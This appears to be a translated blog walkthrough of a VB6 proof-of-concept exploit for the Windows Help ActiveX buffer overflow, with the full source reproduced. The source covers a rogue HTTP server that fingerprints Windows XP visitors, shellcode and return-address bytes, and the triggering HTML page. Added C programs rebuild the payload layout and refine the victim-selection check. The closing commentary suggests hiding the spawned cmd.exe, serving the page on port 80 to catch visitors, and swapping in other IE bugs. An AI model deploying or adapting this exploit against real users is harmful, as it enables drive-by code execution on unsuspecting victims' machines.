windows help buffer overflow code.txt
Today I saw this on wawa's site:
Windows Help Buffer Overflow proof of concept remote exploit in Visual Basic 6. Starts a cmd.exe shell on Microsoft Windows XP Kernel Version 5.1.2600.0. Includes source. By Sylvain Descoteaux (download program)
It is an exploit for the Windows Help buffer overflow, written in VB6. Naturally I was interested, so I did a quick analysis:
First, let's call it vbexp. It uses two TextBoxes, one button, one Label and one Winsock control.
Further Winsock controls are then added dynamically at run time with Load, which requires the design-time control to be a control array, so its Index property is set to 0.
The code in Form_Load is:
NbSck = 0 ' index of the design-time Winsock control, tcp(0)
Now the rest:
Private Sub tcp_ConnectionRequest(Index As Integer, ByVal requestID As Long)
On Error Resume Next
NbSck = NbSck + 1
Load tcp(NbSck) ' add a new element to the tcp control array
tcp(NbSck).Accept requestID ' the new element accepts the pending request
End Sub
An error trap is set, and each time a connection request arrives NbSck is incremented, which dynamically adds a Winsock control; the newly added control then accepts the incoming connection.
Private Sub tcp_DataArrival(Index As Integer, ByVal bytesTotal As Long)
Dim Data As String
Dim Send_It As Boolean
tcp(Index).GetData Data ' read the received data
Text1 = Text1 + Data ' append it to the received-data box
If InStr(Text1, "indows NT 5.1") Then ' if "indows NT 5.1" appears anywhere in what has been received so far (IE on XP reports "Windows NT 5.1" in its User-Agent header)
Text1 = "Client: " + tcp(Index).RemoteHostIP + vbCrLf + "Windows Version: NT 5.1" + vbCrLf + "-----------------------------" ' show the IP of the remote peer (the connecting client), then "Windows Version: NT 5.1". When a remote user browses to this fake server with IE, the browser sends its OS version automatically; if it is XP the overflow is sent :). I had misjudged the author.
EBP = Chr(19) + Chr(216) + Chr(36) + Chr(17) ' bytes 13 D8 24 11: the saved EBP becomes 0x1124D813 (little-endian)
EIP = Chr(84) + Chr(200) + Chr(19) + Chr(0) ' bytes 54 C8 13 00: the return address becomes 0x0013C854 (little-endian)
Buildin_The_BuFFer ' build ShellCodeFrst, ShellCode, Buffer and Html_Page (see Module1.bas)
Send_It = True ' "indows NT 5.1" was found, so allow the send below
End If
If Send_It Then ' only if the fingerprint matched
If tcp(Index).State = 7 Then ' 7 = sckConnected: only if the socket is still connected
tcp(Index).SendData vbCrLf + "HTTP/1.1 200 OK" + vbCrLf ' forged status line (note the stray leading CRLF)
tcp(Index).SendData "Content-Length: " + Str(Len(Buffer) + 10000) & vbCrLf ' not the length of Html_Page: Len(Buffer) plus 10000
tcp(Index).SendData "Server: Evil." & vbCrLf
tcp(Index).SendData "Date: Thu, 03 Oct 2002 17:57:10 GMT" & vbCrLf
tcp(Index).SendData "Content-Type: text/html" & vbCrLf
tcp(Index).SendData "Connection: Keep-Alive" + vbCrLf
tcp(Index).SendData vbCrLf ' blank line ends the headers
tcp(Index).SendData Html_Page ' send the forged server headers and the page carrying the buffer to the client
Text1 = Text1 + vbCrLf + "buffer has been sent to " + tcp(Index).RemoteHostIP + vbCrLf
Text1 = Text1 + "Buffer Size Was: " + Str(Len(Buffer)) + " bytes." + vbCrLf
Text1 = Text1 + "First ShellCode size was: " + Str(Len(ShellCodeFrst)) + " bytes." + vbCrLf
Text1 = Text1 + "Shellcode Size was: " + Str(Len(ShellCode)) + " bytes." + vbCrLf ' report to the local Text1
End If
End If
End Sub
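The fingerprint-then-respond step above, as an added C example (not the page's VB6 code, which stays in the listing): it parses a raw HTTP request and makes the same decision. The two requests are constructed for this example; the "indows NT 5.1" token and the response headers are the ones the listing uses. It also shows the pitfall of running InStr over everything received so far: a client that mentions "Windows NT 5.1" elsewhere in the request, here in a Referer header, would be served the payload too, while a check scoped to User-Agent is not fooled.

```c
/* Added example, not the page's VB6 code: the fingerprint-then-respond step of
 * tcp_DataArrival done over a raw HTTP request in C. The two requests below are
 * constructed for this example; the "indows NT 5.1" token and the response
 * headers are the ones the page's code uses. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* case-insensitive prefix compare of n bytes */
static int ieq(const char *a, const char *b, size_t n) {
    for (size_t i = 0; i < n; i++)
        if (tolower((unsigned char)a[i]) != tolower((unsigned char)b[i])) return 0;
    return 1;
}

/* Locate a header by name in a raw request. Returns a pointer to the value and
 * stores its length in *len, or NULL if the header is absent. */
static const char *header_value(const char *req, const char *name, size_t *len) {
    size_t nlen = strlen(name);
    const char *p = req;
    while (*p) {
        const char *eol = strstr(p, "\r\n");
        if (!eol) eol = p + strlen(p);
        if ((size_t)(eol - p) > nlen && ieq(p, name, nlen) && p[nlen] == ':') {
            const char *v = p + nlen + 1;
            while (v < eol && *v == ' ') v++;
            *len = (size_t)(eol - v);
            return v;
        }
        if (!*eol) break;
        p = eol + 2;
    }
    return NULL;
}

/* What the VB code does: InStr(Text1, "indows NT 5.1") over everything received. */
int vb_instr_would_match(const char *received) {
    return strstr(received, "indows NT 5.1") != NULL;
}

/* Stricter form of the same check: only the User-Agent header counts, which is
 * where IE reports "Windows NT 5.1" on XP. */
int is_xp_client(const char *req) {
    size_t n;
    const char *ua = header_value(req, "User-Agent", &n);
    if (!ua) return 0;
    const char *needle = "Windows NT 5.1";
    size_t m = strlen(needle);
    for (size_t i = 0; i + m <= n; i++)
        if (memcmp(ua + i, needle, m) == 0) return 1;
    return 0;
}

/* The response the page's server sends, with two differences: no stray CRLF
 * before the status line, and Content-Length is the real body length rather
 * than Len(Buffer) + 10000. Returns bytes written, or -1 if out is too small. */
int build_response(const char *body, char *out, size_t cap) {
    int n = snprintf(out, cap,
        "HTTP/1.1 200 OK\r\n"
        "Content-Length: %zu\r\n"
        "Server: Evil.\r\n"
        "Content-Type: text/html\r\n"
        "Connection: Keep-Alive\r\n"
        "\r\n%s", strlen(body), body);
    return (n >= 0 && (size_t)n < cap) ? n : -1;
}

/* constructed sample requests */
const char *REQ_XP =
    "GET / HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n"
    "Accept: */*\r\n\r\n";
const char *REQ_OTHER =   /* token present, but in Referer, not in User-Agent */
    "GET / HTTP/1.1\r\n"
    "Host: 192.0.2.10\r\n"
    "User-Agent: Mozilla/5.0 (X11; Linux i686)\r\n"
    "Referer: http://example.invalid/?q=Windows NT 5.1\r\n\r\n";

int main(void) {
    char resp[1024];
    const char *reqs[2] = {REQ_XP, REQ_OTHER};
    for (int i = 0; i < 2; i++)
        printf("request %d: InStr says %d, User-Agent check says %d\n",
               i, vb_instr_would_match(reqs[i]), is_xp_client(reqs[i]));
    if (build_response("<html>x</html>", resp, sizeof resp) > 0)
        fputs(resp, stdout);
    return 0;
}
```

Compile with any C99 compiler and run; the first request is flagged by both checks, the second only by the InStr-style scan. The original also announces a Content-Length larger than what it actually sends, which keeps a Keep-Alive client waiting for data that never comes; a real body length, as here, lets the browser finish the page and run the script.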
------------------ Analysis of the Module1.bas code:
Global NbSck As Integer
Global EIP As Variant
Global EBP As Variant
Global Buffer As Variant
Global ShellCodeFrst As Variant
Global ShellCode As Variant
Global Html_Page As Variant ' NbSck is the numeric counter for the Winsock control array; EIP and EBP hold the values that overwrite the saved return address and frame pointer; Buffer, the two shellcodes and the HTML page are the strings built below
Public Sub Buildin_The_BuFFer()
Dim i As Integer
Dim nop As String
''''' buffer looks like that
'whatever.chm-Nop-ShellcodeFrst-Nop-ShellCode-Nop-Ebp-Eip
'nop are unimportant
'ShellcodeFrst does : add edi,46
'                   : jmp edi
'(Shellcode is at EDI)
'ShellCode does : Start up a cmd.exe (not remote) and crash IE
'               : taken in a paper from David Litchfield
''This proof of concept works with
'Microsoft Windows XP Kernel Version 5.1.2600.0
'Affected software:
' Microsoft Windows 98
' Microsoft Windows 98 Second Edition
' Microsoft Windows Millennium Edition
' Microsoft Windows NT 4.0
' Microsoft Windows NT 4.0, Terminal Server Edition
' Microsoft Windows 2000
' Microsoft Windows XP
'Size of the Buffer depends on the Windows Version
'Based on the Unchecked Buffer in Windows Help
'Other cool modif of this "proof of concept" would be nice to see ;)
'sylvain.descoteaux@sympatico.ca
''''''''''''''''''''' FIRST SHELLCODE THAT POINT TO THE BIG SHELLCODE ''''''''''
ShellCodeFrst = Chr(131) + Chr(199) + Chr(46) + Chr(255) + Chr(231) ' 83 C7 2E  add edi,2Eh ; FF E7  jmp edi
For i = 1 To 14
nop = nop + Chr(144) ' 90h = nop
Next i
ShellCodeFrst = "x.chm" + nop + ShellCodeFrst + nop + Chr(144) ' 39 bytes in total
''''''''''''''''''''' THE BIG SHELLCODE ''''''''''''''
nop = ""
ShellCode = ""
' 49 bytes; each statement below is one x86 instruction
ShellCode = Chr(139) + Chr(236) ' 8B EC  mov ebp,esp
ShellCode = ShellCode + Chr(51) + Chr(255) + Chr(87) ' 33 FF  xor edi,edi ; 57  push edi (a zero dword, the string terminator)
ShellCode = ShellCode + Chr(131) + Chr(236) + Chr(4) ' 83 EC 04  sub esp,4
ShellCode = ShellCode + Chr(198) + Chr(69) + Chr(248) + Chr(99) ' C6 45 F8 63  mov byte ptr [ebp-8],"c"
ShellCode = ShellCode + Chr(198) + Chr(69) + Chr(249) + Chr(109) ' mov byte ptr [ebp-7],"m"
ShellCode = ShellCode + Chr(198) + Chr(69) + Chr(250) + Chr(100) ' mov byte ptr [ebp-6],"d"
ShellCode = ShellCode + Chr(198) + Chr(69) + Chr(251) + Chr(46) ' mov byte ptr [ebp-5],"."
ShellCode = ShellCode + Chr(198) + Chr(69) + Chr(252) + Chr(101) ' mov byte ptr [ebp-4],"e"
ShellCode = ShellCode + Chr(198) + Chr(69) + Chr(253) + Chr(120) ' mov byte ptr [ebp-3],"x"
ShellCode = ShellCode + Chr(198) + Chr(69) + Chr(254) + Chr(101) ' mov byte ptr [ebp-2],"e"  -> "cmd.exe",0 now sits at [ebp-8]
ShellCode = ShellCode + Chr(184) + Chr(68) + Chr(128) + Chr(194) + Chr(119) ' B8 44 80 C2 77  mov eax,77C28044h (hard-coded address from the paper; the PoC is stated to work on XP 5.1.2600.0)
ShellCode = ShellCode + Chr(80) ' 50  push eax
ShellCode = ShellCode + Chr(141) + Chr(69) + Chr(248) ' 8D 45 F8  lea eax,[ebp-8]
ShellCode = ShellCode + Chr(80) ' 50  push eax (pointer to "cmd.exe" as the argument)
ShellCode = ShellCode + Chr(255) + Chr(85) + Chr(244) ' FF 55 F4  call dword ptr [ebp-0Ch] (the 77C28044h pushed above)
For i = 1 To 349
nop = nop + Chr(144)
Next i
ShellCode = nop + ShellCode + nop + Chr(144) ' this is the shellcode part, the heart of the code; the shellcode I had come across was all x86 for Linux, and I had never built it under VB with Chr(*)
''''''''''''''''''' THE BUFFER '''''''''''''''''
Buffer = ShellCodeFrst + ShellCode + EBP + EIP + """>" ' the whole overflow string; the trailing "> closes the PARAM value attribute and the tag
''''''''''''''''''' THE HTML PAGE WITH THE BUFFER ''''''''
Html_Page = "<OBJECT id=weurg type=""application/x-oleobject""" + vbCrLf
Html_Page = Html_Page + "classid=""clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11""" + vbCrLf ' the HTML Help ActiveX control
Html_Page = Html_Page + "codebase=""file:hhctrl.ocx#Version=4,0,0,24""" + vbCrLf
Html_Page = Html_Page + "width=80" + vbCrLf
Html_Page = Html_Page + "height=20>" + vbCrLf
Html_Page = Html_Page + "<PARAM name=""Command"" value=""Related Topics, MENU"">" + vbCrLf
Html_Page = Html_Page + "<PARAM name=""Item1""" + vbCrLf
Html_Page = Html_Page + "value=""EN_CHANGE;c:\" + Buffer + vbCrLf ' Item1 = EN_CHANGE;c:\ followed by the oversized buffer
Html_Page = Html_Page + "</OBJECT>" + vbCrLf
Html_Page = Html_Page + "<script>weurg.HHclick()</script>" + vbCrLf ' HHclick() fires the command, so the oversized Item1 reaches the unchecked buffer
End Sub
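The layout comment at the top of Buildin_The_BuFFer, worked through as an added C example (not code from the original exploit): it rebuilds the same byte sequence from the Chr() values in the listing, reports where each piece lands, decodes the EBP and EIP dwords, recovers the string that stage 2 writes onto the stack, and checks that the stage-1 jump (add edi,46 ; jmp edi) lands in the NOP sled in front of stage 2 both when EDI points at the start of the buffer and when it points at the stager itself; that EDI points somewhere in this region is the only assumption, and it is the one the page's "(Shellcode is at EDI)" comment makes.

```c
/* Added example, not part of the original VB6 exploit: rebuild the byte layout
 * Buildin_The_BuFFer produces and check the arithmetic behind its two-stage
 * shellcode. All byte values are copied from the page; the only assumption is
 * the page's own comment that EDI points into the buffer when stage 1 runs. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NOP 0x90
#define STAGE1_DISP 0x2E  /* immediate of "add edi,46" */

/* stage 1 (ShellCodeFrst): 83 C7 2E  add edi,2Eh ; FF E7  jmp edi */
static const uint8_t STAGE1[] = {0x83, 0xC7, 0x2E, 0xFF, 0xE7};

/* stage 2 (ShellCode): writes "cmd.exe",0 at [ebp-8], then calls the hard-coded
 * address 77C28044h with a pointer to that string */
static const uint8_t STAGE2[] = {
    0x8B, 0xEC,                          /* mov ebp,esp               */
    0x33, 0xFF, 0x57,                    /* xor edi,edi ; push edi    */
    0x83, 0xEC, 0x04,                    /* sub esp,4                 */
    0xC6, 0x45, 0xF8, 'c', 0xC6, 0x45, 0xF9, 'm', 0xC6, 0x45, 0xFA, 'd',
    0xC6, 0x45, 0xFB, '.', 0xC6, 0x45, 0xFC, 'e', 0xC6, 0x45, 0xFD, 'x',
    0xC6, 0x45, 0xFE, 'e',               /* mov byte ptr [ebp-8+i],c  */
    0xB8, 0x44, 0x80, 0xC2, 0x77,        /* mov eax,77C28044h         */
    0x50,                                /* push eax                  */
    0x8D, 0x45, 0xF8,                    /* lea eax,[ebp-8]           */
    0x50,                                /* push eax                  */
    0xFF, 0x55, 0xF4                     /* call dword ptr [ebp-0Ch]  */
};
static const uint8_t EBP_BYTES[] = {19, 216, 36, 17};  /* Chr(19)+Chr(216)+Chr(36)+Chr(17) */
static const uint8_t EIP_BYTES[] = {84, 200, 19, 0};   /* Chr(84)+Chr(200)+Chr(19)+Chr(0)  */

struct layout {
    size_t stage1_off, sled_off, stage2_off, ebp_off, eip_off, total;
    uint8_t buf[1024];
};

static size_t put(struct layout *l, size_t pos, const void *src, size_t n) {
    memcpy(l->buf + pos, src, n);
    return pos + n;
}
static size_t nops(struct layout *l, size_t pos, size_t n) {
    memset(l->buf + pos, NOP, n);
    return pos + n;
}

/* whatever.chm - Nop - ShellcodeFrst - Nop - ShellCode - Nop - Ebp - Eip - "> */
void build_buffer(struct layout *l) {
    size_t p = 0;
    p = put(l, p, "x.chm", 5);
    p = nops(l, p, 14);
    l->stage1_off = p;  p = put(l, p, STAGE1, sizeof STAGE1);
    p = nops(l, p, 14 + 1);                       /* nop + Chr(144) */
    l->sled_off = p;    p = nops(l, p, 349);      /* sled that runs into stage 2 */
    l->stage2_off = p;  p = put(l, p, STAGE2, sizeof STAGE2);
    p = nops(l, p, 349 + 1);
    l->ebp_off = p;     p = put(l, p, EBP_BYTES, 4);
    l->eip_off = p;     p = put(l, p, EIP_BYTES, 4);
    p = put(l, p, "\">", 2);                      /* closes the PARAM value attribute */
    l->total = p;
}

/* little-endian dword, as the CPU reads the overwritten saved EBP / return address */
uint32_t le32(const uint8_t *b) {
    return (uint32_t)b[0] | (uint32_t)b[1] << 8 | (uint32_t)b[2] << 16 | (uint32_t)b[3] << 24;
}

/* If EDI points at buffer offset edi_off when stage 1 runs, "add edi,46 ; jmp edi"
 * lands at edi_off+46. Returns 1 when that is inside the NOP sled in front of
 * stage 2, so execution slides into the big shellcode. */
int stage1_lands_in_sled(const struct layout *l, size_t edi_off) {
    size_t target = edi_off + STAGE1_DISP;
    return target >= l->sled_off && target < l->stage2_off;
}

/* Recover the string stage 2 writes at [ebp-8]: one imm8 per "C6 45 xx imm8" */
void stage2_string(char out[8]) {
    for (int i = 0; i < 7; i++)
        out[i] = (char)STAGE2[8 + 4 * i + 3];
    out[7] = '\0';
}

int main(void) {
    struct layout l;
    char s[8];
    size_t cand[2];
    build_buffer(&l);
    stage2_string(s);
    printf("buffer %zu bytes: stage1 @%zu, sled @%zu..%zu, stage2 @%zu (%zu bytes), EBP @%zu, EIP @%zu\n",
           l.total, l.stage1_off, l.sled_off, l.stage2_off - 1, l.stage2_off,
           sizeof STAGE2, l.ebp_off, l.eip_off);
    printf("EIP = 0x%08X, EBP = 0x%08X, stage 2 runs \"%s\"\n",
           le32(EIP_BYTES), le32(EBP_BYTES), s);
    cand[0] = 0; cand[1] = l.stage1_off;
    for (int i = 0; i < 2; i++)
        printf("EDI at offset %zu -> stage 1 jumps to %zu: %s\n", cand[i],
               cand[i] + STAGE1_DISP, stage1_lands_in_sled(&l, cand[i]) ? "in sled" : "MISSES");
    return 0;
}
```

The rebuilt buffer is 797 bytes (39 for ShellCodeFrst, 748 for ShellCode, 4 + 4 for EBP/EIP, 2 for the closing quote and bracket), which is what the VB program reports in Text1 as "Buffer Size Was". One caveat when reusing the VB6 approach: Chr() produces a Unicode String and SendData converts it back through the system ANSI code page, so the byte values survive on a single-byte Western code page, but on a DBCS locale such as Chinese Windows values like 139 or 144 are lead bytes and may not round-trip; carrying the shellcode in a Byte array is the safer choice.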
This exploits a vulnerability in IE. What would happen if I used a different Command to replace the name="" in the PARAM?
Here cmd pops up a window on its own; if you give cmd a parameter it can run in the background without being noticed. You could of course also write out a script file, bind a command, and so on.
From here, a word about passive attacks (the victim connects to the attacker): run this virtual server on the HTTP port, say 80, and when a client whose system version is NT 5.1, i.e. XP, visits, the
tcp(Index).GetData Data
Text1 = Text1 + Data
If InStr(Text1, "indows NT 5.1") Then
... part is triggered, and the next step is carried out.
Html_Page = Html_Page + "classid=""clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11""" + vbCrLf
Html_Page = Html_Page + "codebase=""file:hhctrl.ocx#Version=4,0,0,24""" + vbCrLf
In this module these lines can be swapped out to use other IE bugs to run a script of your choice, or to do whatever you have in mind.
From this code you can see that VB can serve as the framework of an exploit; then, as long as the shellcode is prepared, it should not be hard to write an exploit.